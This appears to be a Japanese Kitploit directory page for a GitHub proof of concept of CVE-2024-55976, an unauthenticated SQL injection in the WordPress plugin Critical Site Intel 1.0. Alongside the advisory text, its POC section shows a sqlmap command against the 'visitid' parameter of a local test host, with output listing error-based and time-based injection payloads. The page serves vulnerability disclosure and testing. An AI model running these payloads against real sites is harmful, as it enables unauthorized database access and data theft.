Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-55976 — Critical Site Intel <= 1.0 - 未認証SQLインジェクション | Kitploit
ツール/GitHubGitHub/randomrobbiebf/cve-2024-55976
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテストデータベースセキュリティ
GitHubrandomrobbiebf/cve-2024-55976

CVE-2024-55976

Critical Site Intel <= 1.0 - 未認証SQLインジェクション

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-55976 Critical Site Intel <= 1.0 - 未認証SQLインジェクション

説明

WordPress用Critical Site Intelプラグインは、1.0を含むそれ以前のバージョンにおいて、ユーザー指定パラメータのエスケープ処理が不十分であり、既存のSQLクエリの準備処理が十分でないため、SQLインジェクションに対して脆弱です。この脆弱性により、認証されていない攻撃者が既存のクエリに追加のSQLクエリを付加し、データベースから機密情報を抽出できる可能性があります。

詳細

  • タイプ: プラグイン
  • スラッグ: critical-site-intel-stats
  • 影響を受けるバージョン: 1.0
  • CVSSスコア: 9.8
  • CVSS評価: 重大
  • CVSSベクトル: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • CVE: CVE-2024-55976
  • ステータス: クローズ

POC

root@kitploit:~
python3 sqlmap.py -u 'http://kubernetes.docker.internal:8099/?visitid=1' --level=3 --risk=2 --dbms='MySQL' -p visitid 
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.8.12.2#dev}
|_ -| . [(]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:31:35 /2025-01-03/

[13:31:35] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: visitid (GET)
    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: visitid=1 AND GTID_SUBSET(CONCAT(0x71766a6a71,(SELECT (ELT(8827=8827,1))),0x7171626271),8827)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: visitid=1 AND (SELECT 4706 FROM (SELECT(SLEEP(5)))qhkF)
---
[13:31:35] [INFO] testing MySQL
[13:31:35] [WARNING] reflective value(s) found and filtering out
[13:31:35] [INFO] confirming MySQL
[13:31:35] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.0

ツールをダウンロード